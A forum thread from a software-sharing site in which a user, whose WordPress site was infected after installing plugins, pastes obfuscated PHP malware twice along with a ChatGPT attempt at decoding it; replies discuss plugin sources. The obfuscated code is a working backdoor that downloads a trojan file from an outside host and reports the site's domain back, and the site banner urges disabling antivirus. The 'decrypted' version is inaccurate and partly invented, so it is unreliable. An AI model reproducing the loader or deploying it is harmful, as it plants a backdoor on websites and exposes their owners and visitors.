• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Viruses in some WordPress plugin malicious infected files

paulo3d

Well-known member
Trusted Uploader
Mar 14, 2021
184
272
63
Brasil
Yesterday after installing some wordpress plugins, my site was infected by a malicious code inserted in my index.php and .htaccess files, this code corrupted the functions leaving sites offline and breaking the codes where it contained, the code was obfuscated, so I asked ChatGPT to remove the obfuscation I will leave below the malicious code and code without obfuscation that chatGPT made, I continue from the infected plugin to delete, anyone who knows anything and can help with tips and advice to help I will be grateful, a detail the malicious code infected other subfolders of subdomains as well.

Below the obfuscated malicious code and below without the obfuscation:

OBSTERED:
<php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=${33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.${6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"]-;if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?>


DECRYPTED: chatGPT

<?php
$O__O00_OO0 = '';
if (isset($_SERVER["HTTP_HOST"])) {
return $_SERVER["HTTP_HOST"];
} elseif (isset($_SERVER["SERVER_NAME"])) {
return $_SERVER["SERVER_NAME"];
}
return $O__O00_OO0;

$url = $_GET['url'];
$OO0O0_0_O_ = @file_get_contents($url);
if (!$OO0O0_0_O_) {
$O0O0_O_0O_ = curl_init();
curl_setopt($O0O0_O_0O_, CURLOPT_URL, $url);
curl_setopt($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
$OO0O0_0_O_ = curl_exec($O0O0_O_0O_);
curl_close($O0O0_O_0O_);
}
return $OO0O0_0_O_;

$O_0O_O_0O0 = '';
$O_0_O_OO00 = array();
$O_0_O_OO00["path"] = str_replace('//', '/', str_replace('\\\\', '/', $_SERVER["PHP_SELF"]));
$O_0_O_OO00["domain"] = $_SERVER["SERVER_NAME"];
$O_0_O_OO00["shell_link"] = "https://domain.com/about.php?520";

if (isset($_GET["del"]) && $_GET["del"] == "my_code") {
$O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
$OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
$O_OO_0_0O0 = "<php>php('df');/*<?php\n//php\ncode\n?><div style=\"font-style: color:red;\">"; // This part is still obfuscated

$OO0O0O0___ = "<div style=\"font-style: color:red;\">" . $OO0O0O0___ . "</div>";
$O0O_0O_0OO = @fopen($O0_0OO_O0_, "w");
fwrite($O0O_0O_0OO, $OO0O0O0___);
fclose($O0O_0O_0OO);
header("Location: " . $O_0_O_OO00["shell_link"]);
}
 
  • Like
Reactions: macholx
Yesterday after installing some wordpress plugins, my site was infected by a malicious code inserted in my index.php and .htaccess files, this code corrupted the functions leaving sites offline and breaking the codes where it contained, the code was obfuscated, so I asked ChatGPT to remove the obfuscation I will leave below the malicious code and code without obfuscation that chatGPT made, I continue from the infected plugin to delete, anyone who knows anything and can help with tips and advice to help I will be grateful, a detail the malicious code infected other subfolders of subdomains as well.

Below the obfuscated malicious code and below without the obfuscation:

OBSTERED:
<php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=${33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.${6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"]-;if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?>


DECRYPTED: chatGPT

<?php
$O__O00_OO0 = '';
if (isset($_SERVER["HTTP_HOST"])) {
return $_SERVER["HTTP_HOST"];
} elseif (isset($_SERVER["SERVER_NAME"])) {
return $_SERVER["SERVER_NAME"];
}
return $O__O00_OO0;

$url = $_GET['url'];
$OO0O0_0_O_ = @file_get_contents($url);
if (!$OO0O0_0_O_) {
$O0O0_O_0O_ = curl_init();
curl_setopt($O0O0_O_0O_, CURLOPT_URL, $url);
curl_setopt($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1);
$OO0O0_0_O_ = curl_exec($O0O0_O_0O_);
curl_close($O0O0_O_0O_);
}
return $OO0O0_0_O_;

$O_0O_O_0O0 = '';
$O_0_O_OO00 = array();
$O_0_O_OO00["path"] = str_replace('//', '/', str_replace('\\\\', '/', $_SERVER["PHP_SELF"]));
$O_0_O_OO00["domain"] = $_SERVER["SERVER_NAME"];
$O_0_O_OO00["shell_link"] = "https://domain.com/about.php?520";

if (isset($_GET["del"]) && $_GET["del"] == "my_code") {
$O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php";
$OO0O0O0___ = @file_get_contents($O0_0OO_O0_);
$O_OO_0_0O0 = "<php>php('df');/*<?php\n//php\ncode\n?><div style=\"font-style: color:red;\">"; // This part is still obfuscated

$OO0O0O0___ = "<div style=\"font-style: color:red;\">" . $OO0O0O0___ . "</div>";
$O0O_0O_0OO = @fopen($O0_0OO_O0_, "w");
fwrite($O0O_0O_0OO, $OO0O0O0___);
fclose($O0O_0O_0OO);
header("Location: " . $O_0_O_OO00["shell_link"]);
}
Send a list of plugins used and source from where you got them so that others can be aware
 
  • Like
Reactions: paulo3d
Send a list of plugins used and source from where you got them so that others can be aware
Element Pack Pro
6.8.0
This Codelist site has, as usual, taking resources from here in the community and adding them to its site, be careful using resources that are not from the Babiato forum, or downloading resources from user comments that are not authorized by Babiato administrators, it can be harmed in use them
 
  • Like
Reactions: CAFFEiNE
Element Pack Pro
6.8.0
This Codelist site has, as usual, taking resources from here in the community and adding them to its site, be careful using resources that are not from the Babiato forum, or downloading resources from user comments that are not authorized by Babiato administrators, it can be harmed in use them
Ah I see. If this plugin is one you use often, I highly recommend buying it from @Medw1311

$3.5/year to not have to deal with this headache is a good deal. Alternatively, be highly selective of which uploaders files you download. At least here on Babiato quality control measures are put in place to vett the contents so the risk is lower.
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock